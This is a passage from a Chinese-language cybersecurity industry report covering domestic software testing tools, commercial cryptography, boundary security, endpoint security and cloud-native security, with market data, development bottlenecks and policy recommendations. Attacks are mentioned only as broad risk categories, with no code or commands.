侧重语言多样性支持、持续集成等功能,误报率/漏报率等性能指标与国外 主流产品 Coverity 有一定差距。 12.2.2 国产软件测试工具的应用推广面临共性技术问题 由于软件测试工具普遍缺少统一的调用接口和数据格式,这给国产软件 测试工具的应用推广和迭代发展带来了许多技术方面的问题: 一是测试工具 功能封闭,难以被其他相关系统调用和集成;二是数据封闭,软件测试设计 数据、过程数据、结果数据等分别以自定义的格式存储在软件中,难以共享; 三是技术封闭,用户难以在工具的基础上扩展应用新技术、新方法,导致实 际测试使用过程中,各测试工具之间无法形成合力,数据无法有效利用逐渐 形成数据孤岛。这种现状极大地限制了软件测试行业在网络时代、智能时代 的开放、共享、融合发展的需求,也限制了国内软件产品质量的提升。 12.2.3 国产软件测试工具高质量发展需解决四个瓶颈问题 一是要解决理论瓶颈问题。软件测试工具研发需要综合运用编译器优化、 形式化方法、程序分析等多领域底层技术。国际上大量先进工具均依托于知 名大学的研究团队,如Coverity 源自斯坦福大学计算机研究院。国内在持续 开展程序分析等底层理论技术研究的高水平大学、科研院所等太少,仅有清 华大学、国防科技大学、南京大学、中国科学院等院校开展了此类技术研究。 二是要解决标准瓶颈问题。软件测试工具权威性在于是否符合行业和国 际编码、研发、测试、安全等相关标准。国外厂商基于自有知识产权和发明 专利,深度参与国际标准制定,规范引领产业发展。国内大部分从业厂商规 模较小,出于生存的考虑把大量的时间和精力花在现实项目和产品研发上, 无暇深度参与标准拟制的长远工作。另外,国内基础软硬件技术路线分散的 实际情况,也为软件测试工具的标准化带来了较大困难。 三是要解决人才瓶颈问题。与操作系统、数据库等其他基础软件面临的 情况类似,测试工具开发需要大量高水平的系统软件工程师,其中的核心工 程师还需要掌握软件理论知识。目前国内这方面的人才极度匮乏。 四是要解决生态瓶颈问题。国内大部分厂商产品单一,以单点工具销售 为主,与拥有成熟产品体系和一站式解决方案的国外厂商相比,不具备竞争 优势。另外,国外厂商长期服务于全球顶尖企业,研发资金与市场反馈形成 闭环, “滚雪球”效应明显。反观国内厂商,由于起步晚,建立生态的过程 步履维艰,处在“高投入、低产出”的阶段。 12.3 把握市场机遇,突破关键技术、营造良性环境,快速做大做强 12.3.1 把握三个市场机遇 十四五期间,国产化替代、新兴高端制造、软件开发安全是软件测试工 具厂商的三个市场机遇。首先,在推进国产化替代过程中,关键信息基础设 施行业用户对软件测试的重视程度不断提升,而国外工具又不支持自主创新 的基础软硬件环境,这给国产工具提供了难得的发展机遇。其次,低轨卫星、 无人系统、车联网、智能制造、新能源汽车等新兴领域和高端制造数字化转 型,享受国家内需拉动、高端制造扶持政策,对产品质量要求极高。由于国 内外细分行业编码及测试标准尚未成型,这又给国内软件测试工具厂商提供 了一个市场空间巨大的机遇。最后,新形势下软件漏洞威胁上升到国家安全、 行业安全的高度,软件开发安全纳入到了软件开发流程,软件安全分析成为 软件测试的重要环节,这为软件测试工具提供了又一个细分市场。 12.3.2 尽快突破关键技术,提高产品成熟度 自主创新的基础软硬件与Wintel 体系存在较大差异。这既是挑战,也是 机遇。国产测试工具要加快国产操作系统平台移植进度,抓住自主创新的市 场机遇期,在政府、金融、电力、军工、航天、航空等行业,与测试机构、 龙头企业合作,打磨形成可用、好用的测试工具。同时,国内厂商应对标国 际一流产品,在缺陷误报率和漏报率、未知漏洞自动挖掘、云测试等关键指 标或核心技术上,争取取得突破。最后,软件测试工具面临的是开放市场, 国内厂商要扩大市场占有率,必须认真打磨产品细节,在实用性、易用性、 稳定性等方面提高产品成熟度。 12.3.3 建立行业自律共识,保护可持续发展空间 市场开拓越难,越易出现市场乱象。个别“穿马甲”的厂商由于无需投 入核心技术研发经费,产品研发成本低,容易出现恶意低价竞标的情况,严 重冲击了真正开展核心技术自主创新并投入大量研发经费的企业。另外,个 别厂商在投资方压力下,以低价中标的方式片面追求市场占有率,导致客户 被绑架进而影响国产工具口碑。针对上述情况,业内企业需要建立行业自律 共识,制定测试工具评价标准体系,营造良性竞争环境,唯此才能确保产业 可持续发展。 本章主笔人员: 湖南泛联新安信息科技有限公司蔡一兵、毛伟、韩葆、李成 13、 商用密码应用 14、 边界安全 15、 终端安全 16、 云计算安全 17、 数据安全 18、 高级威胁检测 19、 漏洞管理 20、 反恶意代码引擎 21、 安全管控 22、 工控安全 23、 电子数据取证 24、 软件供应链安全 25、 灾备 13.商用密码应用 密码作为国之重器,是国家重要战略资源,也是保障网络与信息安全的 核心技术和基础支撑。当前,密码技术正在以前所未有的广度和深度与信息 技术相互促进、融合发展,为网络空间的云计算、大数据、物联网等应用安 全保驾护航。如何推动商用密码技术与新兴技术的融合,是新时期深化商用 密码应用要解决的关键课题。 13.1 商用密码融入网信产业生态 13.1.1 商用密码与新技术快速融合 密码是安全的基因,融合应用才有价值。近年来,密码以前所未有的速 度深度融入网络安全的各个主战场,推动形成网络空间安全协同生态圈。例 如,密码云环境融合,赋能云上应用安全。密码与大数据融合,在数据防泄 露、隐私保护等问题上发挥核心作用。密码与物联网融合,保障终端设备安 全、数据传输存储和使用安全、身份鉴别安全。密码与人工智能融合,构建 可靠的数据使用环境,保证算法模型的机密性和完整性。密码与区块链融合, 推动环签名、属性签名、零知识证明、多方安全计算等密码技术发展。密码 与零信任融合,以身份为中心实现动态访问控制。密码与可信计算融合,构 建用户与可信执行环境之间的可信交互通道。 13.1.2 商用密码应用领域不断扩宽 商用密码在各领域内的推广应用是我国迈向网络化、现代化、数字化的 重要基础。目前,政务、通信、金融仍是商用密码的三大主力市场,其中政 务占比接近25%,通信与金融各占15%,三大行业市场份额合计超50%。据 统计10,金融行业累计发行由国密算法支持的银行卡超过10亿张;在政务领 10 数据来源:中金企信数据 域全国10个省(区、市)完成了商用密码技术支撑的政府云试点建设,服 务用户超过5000万。除三个主力市场外,近年来商用密码产品在能源、广 电等领域的应用也在不断加深。在能源领域,部署支持商用密码的智能电表 超过了5亿只;在广播电视领域,基于商用密码技术的数字版权保护技术在 2700万台移动智能终端上使用。 金融行业的商用密码应用场景主要包括传统的金融柜面系统,网上银行、 网上证券交易、网上投保等各种网上系统,以及各种金融机构之间的横向信 息系统,如支付清算系统、登记结算系统、保单登记平台等。密码作为保障 信息安全的核心技术,在金融领域身份认证、信息完整性、保密性和不可抵 赖性等方面发挥着关键作用,对维护金融信息安全发挥着重要的作用。 全国各省级政府机构在开展电子政务系统建设过程中不断推进商用密码 的全面应用。根据相关文件要求,政务信息化在项目建设中要同步规划、同 步建设、同步运行密码保障系统并定期进行密码应用安全性评估。客观上, 商用密码应用安全性评估工作极大地推动了商用密码的广泛应用。政务外网 基于商用密码技术与密码产品已经完成了诸多安全性改造。政务 CA 目前已 基本覆盖全国各省、自治区和直辖市。在移动政务中,也同样使用了商用密 码技术与产品,为政务外网的扩展和移动业务提供了安全保障。政务云建设 是国家电子政务发展的重要支撑,政务云密码服务平台提供了云密码服务模 式,实现了密码的统一集中运维管理。 相信随着国家对商用密码产业的重视程度不断加强,以及商用密码与其 他技术的融合越来越深入,商用密码产品在各行业的应用深度和广度也会不 断加深。 13.1.3 商用密码在深化融合发展和行业应用方面仍面临问题 尽管商用密码在与其他技术和产业融合发展中取得了不错的成效,但如 何深化发展,与网信产业形成紧耦合关系,在行业应用过程中提质增效,也 是业界面临的重要问题。例如,密码产业发展环境还不完善,仍然缺乏面向 不同行业的商用密码应用工作指导性文件;密码安全保障需求不足,商用密 码建设滞后于业务发展;产业链供应链创新比较薄弱,产业发展仍面临短板、 弱项;密码领域人才储备严重不足等。 13.2 深化商用密码应用,面临三方面挑战 13.2.1 法律法规标准的引导作用发挥不充分 在网信领域,商用密码是政策性最强的一个节点。当前,尽管《网络安 全法》、 《密码法》、 《关键信息基础设施安全保护条例》等多部法律法规 中明确了商用密码应用的要求,但在落地实施上仍有待完善。由于不同行业 信息系统的差异化,商用密码技术的应用场景、应用范围和管理手段等都不 尽相同,对于具体行业来说,缺乏具备可操作性的指导文件,这在一定程度 上制约了商用密码应用的推广。 另外,相关的标准规范体系仍不完善。目前颁布的国家密码相关标准中, 绝大部分都是关于单个产品的实现标准。随着新技术的快速发展,特别是商 用密码与新技术的融合越来越紧密,相关的跨界标准成为急需。 13.2.2 商用密码产业自身的创新发展面临问题 首先,商用密码应用缺乏有效产业支撑平台,创新载体不足,缺乏系统 化、 一体化的密码支撑体系。由于专业从事商用密码的大型企业较少,多数 企业是创新密码技术为主导的中小型企业,这导致产业集群优势和聚合效应 难以体现。 其次,商用密码应用不仅仅是密码算法的问题,还涉及到芯片、操作系 统、数据库、中间件等基础软硬件,以及大量的、各类繁多的应用软件。由 于这些领域的核心技术受制于人的局面尚未改变,商用密码的应用也随时面 临被“卡脖子”的风险。 第三,商用密码应用存在与业务系统耦合程度不够、低效算法实现难以 满足高性能需求、应用软件密码集成门槛高等挑战。另外,商用密码产品的 种类和供给质量在适应需求变化方面存在滞后的问题,密码应用局部化、碎 片化、外挂化的现象比较普遍。这导致重要信息系统和关键信息基础设施, 特别是其中针对新业态、新应用的密码防护比较薄弱,密码产品使用不规范、 应用范围不广、创新性不足的问题比较突出。 13.2.3 用户对商用密码的认知和重视程度不够 伴随着政策大力驱动和安全急迫需求,提升商用密码的覆盖面和应用深 度,是当前的重要目标。然而,由于行业用户对密码重要性的认知不足,导 致投入较少,商用密码建设滞后于业务发展,内建安全动力和能力不足,有 的用户对商用密码的应用开发和技术改造仍然处于政策驱动阶段,受研发成 本和技术能力的限制,主动使用商用密码解决复杂网络环境下安全问题的意 愿不强,未能与业务系统同步开展需求调研、方案设计与建设实施,密码保 障方面投入比例较少,安全建设滞后于业务功能建设。另外,针对商用密码 应用的安全性评估手段也有待加强和完善。 13.3 打造商用密码高质量供给体系 13.3.1 强化商用密码应用顶层设计 为了切实推进商用密码应用,进一步优化政策环境,国家和重要行业需 进一步完善优化相关政策和标准,加强顶层政策和标准落地,细化领域政策 和标准。为更好地适应各行业差异化的安全需求,建议有关部门聚焦重要行 业,明确行业内密码应用的安全需求,完善密码应用标准化工作,有效指导 各行业开展商用密码应用工作,充分发挥标准化的基础性和引领性作用。在 GB/T39786-2021《 信息安全技术信息系统密码应用基本要求》等标准基础上, 加快制订面向不同行业、不同领域的商用密码应用标准,尤其要重点关注重 要领域和关键行业对密码应用的安全需求,从整体上提升各行业对规范应用 密码标准的重视程度,以期实现不同行业系统间数据的互联互通。 在产业界,要加强密码标准化顶层设计,加快编制基础急需密码标准, 形成完整、科学、系统的商用密码标准体系,持续完善密码检测认证体系, 建成完备的密码评估与验证环境。在此基础上,要做好密码应用标准与网络 安全等级保护和关键信息基础设施安全保护之间的衔接,高效促进商用密码 与网络安全工作的深度融合。 13.3.2 提升商用密码自主创新能力 打铁还要自身硬,商用密码科技创新和产业发展要重点抓住三个方向: 一是瞄准密码理论研究国际前沿,着力促进密码基础理论创新,持续推出一 批世界领先水平的原创性成果,不断提升我国密码研究领域的国际地位;二 是组织密码共性关键技术攻关,打通密码科技创新成果应用转化渠道,不断 取得核心关键技术突破;三是要加强企业间的交流合作,探索与其他领域的 厂商和系统集成商之间的深度合作模式,形成合作共赢的新型协作关系,打 造满足市场需求、产品性能领先的商用密码产品和解决方案,带动密码产品 与网安领域其他产品全面适配和深度融合。 同时,要探索构建商用密码科技创新和产业发展大平台,形成产业融合、 优势集聚的产业支撑体系,充分利用社会密码研究资源形成联动合力,以国 家密码基金、重大工程、课题研究等为牵引,推动密码科技创新成果应用转 化,引导学术成果向产业加速转化。在加强技术创新的同时,产业界要着力 优化密码生态体系建设,协同密码基础理论研究、标准化推进、产业链融合 三个方面的工作;完善密码检测认证体系建设,综合发挥密码产品检测认证、 密码应用安全评估和关键基础设施密码安全审查的技术把关作用;打造满足 市场需求的全产业链条体系,促进商用密码产业多样化、全覆盖发展,促进 技术、产品和应用的互联互通,构建优势互补的密码产业生态体系。 本章主笔人员: 北京海泰方圆科技股份有限公司王学进 三未信安科技股份有限公司鹿淑煜 本章贡献人员(按公司名称拼音排序): 北京安御道合科技有限公司陈普贵 北京炼石网络技术有限公司白小勇、魏婷 北京时代亿信科技股份有限公司沙勇 北京数盾信息科技有限公司张国庆、赵亚新 北京天融信网络安全技术有限公司刘治平 北京信安世纪科技股份有限公司汪宗斌 北京忆芯科技有限公司熊明霞、林岗、姚宇 湖南麒麟信安科技股份有限公司高洪鹤 江南信安(北京)科技有限公司王鸿志 江苏云涌电子科技股份有限公司高渊、黄婉静 上海众人智能科技有限公司钱金金 无锡沐创集成电路设计有限公司王孟元 芯盛智能科技有限公司窦步纹 兴唐通信科技有限公司刘岩蟠、胡睿、申苏浩 渔翁信息技术股份有限公司岳鹤涛、刘大伟 郑州信大捷安信息技术股份有限公司刘献伦、康亮、韩金池 中国航天科工集团第二研究院七○六所于然、石波、许睿 中国移动通信有限公司研究院李邦灵、马爱良、张艳 14.边界安全 随着国产基础软硬件性能和稳定性不断提升,边界安全产品逐步实现了 “自主研发”和“安全可信”的深度融合。目前,边界安全厂商已经开始基 于国产芯片和操作系统开展适配工作,并取得了一定的工作成效。基于国产 处理器和操作系统(包括安全厂商自研的操作系统)的边界网关类产品已经 批量应用。 14.1 自主边界产品逐步扩大应用范围,但总体不占优势 目前,基于国产基础软硬件的边界安全设备在重点行业领域完成了近 万台部署。然而不能回避的现状是,受国产基础软硬件性能和生态的影响, 相关安全产品的整体性能和可靠性低于非国产化版本。除部分厂商基于国产 X86 架构处理器推出的高性能数据中心防火墙在金融、电信等领域有相对广 泛的应用外,多数自主边界安全产品主要应用于中低端、非核心场景。同等 硬件和软件规格的数据中心防火墙,产品硬件、操作系统和上层应用未做优 化的情况下,国产化版本比非国产化版本产品性能下降近一半,并且整机因 国产CPU 等元器件数量的增加,导致故障点和散热难度等增加,稳定性下降。 也正是因为这个原因,边界安全市场仍由基于国外的技术路线占统治地位。 14 .2产业链上游对边界安全产品存在四点影响 从产业链的角度看,边界安全的上游主要是芯片和操作系统。自主边界 安全产品的性能、稳定性、可靠性和市场表现很大程度上受到上游要素的影 响。 第一,上游基础软硬件的质量和兼容性决定着边界安全产品的性能和稳 定性。国产芯片等基础元器件作为底层硬件架构,直接影响边界安全产品的 性能;操作系统作为核心基础软件的灵魂,与边界安全产品的融合程度将影 响后者的稳定性。 第二,上游基础软硬件的技术路线影响着边界安全产品的路径选择和更 新迭代。目前,上游基础软硬件存在大量不同技术路线的组合,底层技术架 构不兼容、指令集不统一,导致下游边界安全产品厂商在适配测试与兼容认 证方面面临沉重的负担,进而导致产品更新迭代受阻。 第三,基础软硬件的供应链风险直接影响自主边界安全产品的交付与使 用。从硬件层面看,部分与国外进行技术合作的国产CPU 平台, 一旦面对 禁运断供停产等极端情况,则将直接影响自主边界安全产品的生产和供货; 从软件层面看,国产操作系统主要基于Linux 内核, 一旦发生闭源调整、系 统停维等情况,也将严重影响边界安全产品的更新迭代。 第四,由于国产化产品的整体市场规模不足,安全厂商无法对国产化元 器件进行大规模采购,导致自主创新边界安全产品的单价相对于非国产化产 品没有竞争优势。尤其对于注重网络建设成本的行业而言,使用自主创新边 界安全产品组网的概率较低。 14.3 立足自身解决问题,走出边界安全新路 14.3.1 用安全自研芯片弥补国产 CPU 性能差距 为了应对短期内国产处理器性能不足的挑战,业界提出了全新的软硬 件融合(本质上是快慢融合)设计理念,将硬件的性能和软件的灵活性通过 多种硬件平台进行有效组合,达到软件灵活性和硬件高效性的统一,能够应 对复杂多变的应用挑战,同时能够降低芯片一次性成本过高和周期过长导致 的设计风险。目前已有国内厂商将软硬件融合解决方案应用到边界安全网 关,利用自研安全芯片的处理能力分担CPU 的处理负载, 一定程度上解决 了中央处理器性能不足的瓶颈问题。硬件加速引擎专注于流量卸载,在较高 流量场景下,也可轻松卸载CPU 的压力,使得CPU 更加聚焦综合安全业务 处理能力,报文转发延时可低至几微秒,完全胜任对时延敏感的应用场景。 另外,通过异构计算架构对边界安全产品做硬件加速,可使整机吞吐量达到 320Gbps, 满足数据中心等对流量要求较高的场景需求。 14.3.2 边界安全自身向智能化、平台化发展 面对安全威胁日益升级,传统以分析安全问题、固定规则设定的研究方 法变得效率低下、甚至无能为力,而人工智能在边界安全领域有其用武之地。 例如头部安全厂商依靠边界安全方面积累的优势,设计以防火墙+云端智能 联动的方式来实现钓鱼邮件的检测,能够满足防火墙实时阻断,而邮件网关 基于URL 链接识别+附件压缩加密识别+人工智能技术识别钓鱼邮件。上 述设计使网关侧拥有较强的钓鱼邮件检测和阻断技术,检测率达到95%,并 且在钓鱼邮件检出后能够持续提取其中的恶意URL、 域 名 、IP 等信息补充 到威胁情报系统中。 平台化是未来边界安全产品、技术和生态的重要演进方向。随着传统 防火墙自身“嗅觉”和“视觉”的灵敏度逐渐下降,未来的自主边界安全产 品需要从“云管端人”四个方面聚合更多的安全能力,来提升检测识别和访 问控制的精度。目前最新的NGFW 产品上实现了平台化与智能协同能力。 在云端侧,下一代防火墙可联动威胁情报、沙箱、SOC 等组件增强防火墙 对外部环境的感知,提升未知威胁的防护能力;在网络侧,联动已部署的其 他安全节点,形成动态的主动防御体系,达到联防联控的效果,并通过融入 SD-WAN 功能将安全能力下放到分支与边缘;在终端侧,联动防火墙助手、 EDR、终端安全管理等产品,提升防火墙对内网IT 资产的可见性以及对加 密流量的识别能力;在人机协测,通过防火墙平台化的技术方案,实现大部 分安全事件的自动化处理,必要时可通过云端/现场的安全专家团队进行研 判,达到对安全事件的应急响应。 物联网在给我们的工作和生活带来方便的同时也引入了安全风险,终端、 网络、应用、平台等不同层次均面临着严峻的安全挑战。业界头部安全厂商 提出了针对物联网安全的解决方案,给客户带来全网资产可视、及时发现风 险、有效终端管控、日志报表呈现等方面的价值。 14.3.3 通过上下游协同为拓展市场空间打基础 技术层面,加强边界安全产品与基础软硬件的适配兼容和协同创新。通 过建立自主技术实验室、适配认证中心等方式,对国产芯片指令集、应用软 件基础架构、业务逻辑等进行优化,采用自主研发的协议栈与闭源核心代码, 构建操作系统与自主芯片统一适配、规划、开发的安全设计体系,推动协同 研发、平台适配、选型测试等工作,推进上下游的技术联动与落地验证,形 成可验证、可迭代、开放包容的自主可控技术融合新范式。 市场层面,整合上下游资源,打造覆盖芯片、操作系统、边界安全的生 态链,弥补高端芯片等供应不足的短板,增强产业链风险抵抗能力。现时调 配上下游资源要素,打造高附加值的产品和方案,形成品牌效应。 用户层面,整合上下游产品资源,立足于行业用户需求进行应用创新, 实现国产化应用与行业场景的深度融合。 本章主笔人员: 北京山石网科信息技术有限公司许玉善 本章贡献人员(按公司名称拼音排序): 北京天融信网络安全技术有限公司赵琛、马云鹏 北京网御星云信息技术有限公司蒋惠 北京中科网威信息技术有限公司李继磊 沈阳东软系统集成工程有限公司李梅、刘琼 15.终端安全 终端安全是以“为用户终端提供有效安全防护”为核心目标,通过管理 平台和轻量化代理组合,对台式机、笔记本、服务器、移动智能设备、工作 站和哑终端设备进行全场景统一综合安全防护的产品。当前的终端安全产品 在满足合规性基础上,主要关注精准识别、动态塑造、有效防护、快速检测 和响应处置五个关键环节的安全能力。 15.1 国产化终端安全从合规驱动转向价值驱动 随着国产化终端在各领域的广泛应用,其所处的网络环境逐渐复杂化, 致使遭受病毒攻击、木马植入以及非法内外联的概率大大提升。另外,国产 化终端硬件环境采用国产化处理器,其中部分型号采用了开源处理器指令集, 操作系统也是衍生于开源Linux 内核,同时也应用了大量的开源库。由于国 产终端各部分的开源特性,在代码级的威胁暴露面也更大。 在国家政策及用户需求升级的驱动下,用户方亟需采购包括杀毒软件、 终端准入、终端管控、数据防泄密(DLP) 、 终端主审等在内的终端安全产品, 来覆盖终端安全防护需求。面对多款终端安全产品,用户分别采购并提供硬 件资源,需要投入较多的人财物资源。同时,在终端上安装多个Agent, 计 算资源消耗大和存在兼容性问题,同时也给安全管理员带来极大的运维工作 量,导致管理成本增大。 面对以上问题,终端安全能力正在从原有的合规驱动转向价值驱动,如 终端安全一体化产品(UES) 凭借其一套产品为终端提供动态的“量体裁衣” 模式的安全防护模式,将成为终端安全市场的主力。原来终端安全能力组件 是拆分在各终端产品上,例如终端杀毒、终端准入、终端桌管、主机审计等 产品,现各安全厂商逐步完成终端安全能力的集约整合,将病毒查杀、主动 防御、异常事件发现、访问控制、合规检测、响应处置等能力放置到一个终 端安全产品内。用户可以在终端安装一套终端安全产品,然后根据对自身终 端防护的范围,来选择搭载哪些能力组件,以有效地减少终端性能占比,以 及终端安全产品与操作系统、硬件平台的兼容性问题。 15.2 国产终端安全面临效能方面的挑战 终端安全产品在持续监控和处置风险过程中需要占用一定的系统资源。 采用国产基础软硬件的国产化终端,在综合性能方面与Wintel架构相比还有 差距。随着终端安全防护面不断扩大,国产化终端安全防护面临效能方面的 挑战。因此,终端安全厂商应与国产CPU 和操作系统厂商开展深度合作, 建立有效的安全协作机制,通过CPU 层面和操作系统层面提供的底层安全 机制提升安全效能,同时探索建立不同于Wintel 的安全防护机制。 此外,随着物联网发展,智慧城市、平安城市、智能交通、工业企业网 络中部署了大量非智能终端设备,即“哑终端”。哑终端设备承载了重要的 关键基础信息,大量的哑终端设备接入到核心网络,而其长期无人值守的特 点导致容易遭到破坏和窃取,存在数据泄露、数据被破坏等安全隐患,进而 引发终端安全的新问题。对于哑终端,常规的终端安全措施不再有效,目前 常用的方案是通过其自身的安全软件或云端安全能力保障其运行安全。 15.3 多维度提高国产化终端安全防护能力 15.3.1 构建一体化终端安全防护能力 (1)终端防护能力一体化 面对效能问题和“信息孤岛”效应,终端安全防护能力一体化是未来的 发展趋势。通过一个代理提供多样化安全能力,通过一体化平台清晰直观地 感知全网终端安全态势,构筑体系化的终端防护能力,规避碎片化、堆砌式 建设带来的弊端。 (2)终端对象管理一体化 对所有防护对象统一管理是终端安全的市场需求之一。通过一体化平台 对全品类终端进行统一管控与防护,减轻整体的安全运维压力。 (3)云管边端联动一体化 终端作为安全防护最末端,具备较强的信息采集和风险处置特性,在与 边界、云端能力配合中,可以有效形成双向检测、双向封堵、双向赋能的能力, 在协防联控中发挥重要作用。 15.3.2 发展内核级防护能力 发展内核级安全防护是国产化终端安全的必经之路。从终端内核出发, 与底层逻辑深度耦合,可有效解决兼容性问题,并显著提升终端安全防护能 力。但是深度耦合和兼容性一直是基于内核做安全防护的难点。在这方面, eBPF和 XDP 技术弥补了IPTables 存在的技术弊端,可能成为未来的主流; 通过密码技术实现内核级防护也是可选择的技术路径;另外,建立基于硬件 安全的可信执行环境,提供设备的接入认证、数据的存储保护、传输保护, 提供控制指令的保护以及核心业务数据的防篡改和抗抵赖,构建集安全运行 环境、主动防御、安全审计等于一体的内核级防护能力体系也是一种思路。 15.3.3 构筑终端安全的底层防线 传统 Win+Intel架构下的终端产品无法从系统底层建立可信根,其防护 产品和攻击方处于同等权限,导致终端产品在对抗中处于不利地位。国产化 大环境下,终端产品具备了从系统底层开始建立可信链的条件:以可信计算 3.0技术为基础,以有效的访问控制为核心,操作系统安全支持应用系统安全, 构筑终端安全防护的底层防线。 15.3.4基于可信计算保障哑终端安全 哑终端存在内部接口少、无操作系统、长期不维护等特点。因此,哑终 端安全防护能力应重点关注威胁的快速发现、入网设备的身份认证、异常设 备的自动发现和隔离、持续监测和可信验证等。基于可信计算的主动免疫防 御技术相对更适用于哑终端的安全防护,从自身防护和安全管理等多个角度 进行可信改造和安全增强,能全方位提升系统的整体安全性。 本章主笔人员: 安天科技集团股份有限公司辛颖、李京雨 本章贡献人员(按公司名称拼音排序): 北京安御道合科技有限公司李永明、邓航 北京可信华泰信息技术有限公司杜君、王杨 北京神州绿盟科技有限公司王凤周、安然 北京天融信网络安全技术有限公司梁连焱、吕佳 北京网御星云信息技术有限公司王斌 杭州安恒信息技术股份有限公司寇石垒 三六零数字安全科技集团有限公司赵新龙、潘颖 上海算石科技有限公司黄坚会、王亮 物迪网(上海)科技有限公司李惠锋、李如前 芯盛智能科技有限公司周礼、邓博 郑州信大捷安信息技术股份有限公司韩金池、廖正赟 16.云计算安全 随着云计算技术的发展和商业模式的日趋成熟,越来越多的单位选择云 计算的形式承载其业务系统。相应地,也带动了云计算安全技术和产业的快 速发展。据统计",云安全市场正处于逐年快速上涨的态势。2020年国内云 安全市场规模为80.4亿元,同比增长45.9%;2021年国内云安全市场规模 为117.7亿元,同比增长46.4%;预计2022年,将达到173.3亿元左右,同 比增长47.2%。根据信通院新发布的云安全全景图(2.0版本),云安全覆 盖了云工作负载保护、网络安全、数据安全、应用安全、身份和访问安全、 安全管理和运营、DevSecOps、 业务安全、安全服务等9大领域。当前云工 作负载保护、网络安全、应用安全、身份和访问安全等领域已逐渐发展成熟, 数据安全、安全管理和运营、DevSecOps 、业务安全、安全服务等领域还都 处于发展早期阶段。本章重点讨论云原生安全技术及其在市场侧的表现。 16.1 云原生安全技术快速发展 16.1.1 云原生的价值被市场接受和认可 数字化转型过程中,应用会更多的迁移到云端。基于云的架构设计和开 发应用,这就是云原生。作为近期广受关注的热点,云原生的价值被市场接 受和认可。 云原生应用发展的技术趋势主要包括容器化部署、微服务架构、自动化 管理等。容器技术是实现云原生应用的重要基础,它将应用和其依赖项打包 到一个可移植的容器中,可以实现快速、可靠的应用交付和管理。微服务架 构是云原生应用的核心概念之一,它将大型应用拆分为一系列小型服务,每 个服务都可以独立部署和管理,从而可以提高应用的可伸缩性、灵活性和可 靠性。自动化管理实现应用的自动化部署、扩容、监控和治理等工作,在减 " https://ww.thepaper.cn/newsDetail-forward-17633083 少人工干预的同时提高应用运行的效率和稳定性。 16.1.2 云原生安全成为业界关注的对象 随着云原生的快速发展,云原生安全也成为各安全厂商关注的对象,主 流的安全厂商都对云原生安全有所布局,部分专业从事云原生安全的厂商开 始在市场侧崭露头角。然而,以DevSecOps、容器安全、微服务安全等为代 表的云原生安全技术和相关产品在市场侧的表现才刚刚起步。特别是在部分 重点行业,私有化部署的要求以及业务环境的复杂性、非标准化等问题,对 云安全产品的市场表现有一定的阻力。另外,在向云原生转化的过程中,将 会存在旧云、新云并存的场景。对于云安全厂商来说,需要考虑新旧技术的 兼容及适配,加上目前国内多技术路线并存的现状,也对云安全厂商提出了 更高的技术要求。 16.2 解构云原生安全 云原生并不是单纯的技术概念,而是一系列与云计算相关的技术以及基 于这些技术衍生的企业管理方法的集合。企业采用基于云原生的技术和管理 方法,可以更好地把业务迁移到云平台,从而享受云的高效和按需分配资源 能力。云原生重塑了云端应用设计、开发、部署和运行模式,使开发人员更 加敏捷、高效地推动业务迭代,实现了自动化、易管理。 一方面,云原生在带给开发人员便利和高效的同时,为了追求便捷的开 发环境与快速的迭代节奏选择将安全系统配置(如权限管理、访问控制等) 的优先级降低,为效率与敏捷让步,最终可能使敏感数据权限管理不当而在 内部泄露、系统资源无防护而在内部开放。另一方面,在应用云原生化后, 无论是基础架构层中的容器还是上层的微服务业务层,都通过API 形式进行 数据传递,其数量急剧增加、调用异常频繁。爆发式的增长导致API 在身份 认证、访问控制、通信加密、以及攻击防御等方面的问题更加明显,也给整 个应用带来更多潜在的风险。 从攻击的角度看,云原生技术的应用也带来了许多新的安全风险。典型 的风险主要包括: 一是暴露的API, 黑客可以利用云原生应用中的API 进行 DDoS 或 SQL注入等攻击;二是容器漏洞,黑客可以通过容器镜像和容器管 理工具存在的安全漏洞越权访问应用程序和系统资源;三是跨容器攻击,黑 客可以通过跨容器攻击来访问其他容器和主机资源;四是配置风险,由于云 原生应用部署和管理的灵活性,可能会存在部署和配置错误,而这些错误会 导致未授权的访问、数据泄露等风险,例如黑客通过持续集成/持续交付(CI/ CD) 管道的不安全配置可以获取开发者账号等。 本质上,云原生安全可以从两个角度来解构: 一是解决云原生环境中业 务的安全问题,主要是运行于容器、微服务、服务网格等云原生环境中的业 务安全;二是提供具备云原生特征的安全解决方案,例如安全监防的内建性、 资源识别和管理归一化、安全应用服务 Serverless (无服务器)化、安全治 理网格化。 16.3 云原生安全需要体系化思维 16.3.1 云原生安全防护思路概述 云原生并不是单纯的技术,其安全防护也不能仅仅从技术维度考虑,应 从技术、管理和运营模式等多维度出发形成综合解决方案,综合运用各项安 全措施,提高云原生环境的安全性和稳定性。主要的安全防护思路包括: 一 是在云原生环境中实施零信任模型,只允许有权限的用户访问资源,防止未 经授权的访问和恶意行为;二是使用容器安全工具,扫描容器镜像和应用程 序,确保它们没有安全漏洞或恶意代码;三是确保应用程序和容器的安全配 置正确,如配置正确的网络策略、容器安全配置、防火墙设置等;四是采用 多层次的安全防护策略,包括网络安全、数据安全、身份和访问安全、应用 安全等;五是确保CI/CD 管道安全可靠,使用安全的凭据、授权策略等来保 护开发者的账号和凭据,防止恶意攻击和数据泄露;六是选择可信的云供应 商,确保其有一定的安全能力,包括应急响应、网络安全、数据安全等,以 及相关的安全认证;七是建立完整的安全运营和管理体系,实施安全监测、 安全事件响应等措施,对云原生环境的安全风险进行有效的监测和管理。 16.3.2构建体系化的安全防护能力 (1)多维度安全防护 加强云网络、云工作负载等多层次的威胁防护能力建设。首先,应依据 业务架构设定信任域,梳理业务流安全防护需求,部署安全策略,实现信任 域隔离。其次,应对云主机、容器进行统一、全面的端点防护、检测与响应, 对应用系统和API 访问进行保护,实现远程与核心应用访问具备基础的零信 任访问控制能力。同时,要加强安全自动化编排与响应能力,持续发现云上 信息资产,评估云服务安全风险,及时发现攻击行为,进而对云上资产进行 安全加固。 (2)多云一致的安全防护 伴随业务应用多云化,云原生安全需要在各类云环境中实现安全组件和 服务能力的无缝衔接,达到混合多云环境安全防护的一致性效果,包括公有 云/私有云容器环境安全能力一致,云安全能力与效果一致,云安全管理流 程一致。 (3)全生命周期和全场景的安全防护 对云上的应用和数据从开发、测试、部署到运行时,建立各个环节的安 全管控。对于云上数据安全,重点关注数据分级分类、数据流转可视、数据 风险监测;对于云上应用安全,重点关注代码扫描、开源组件治理、安全测 试等;对于云上安全检测与响应,重点关注身份安全检测与响应、网络安全 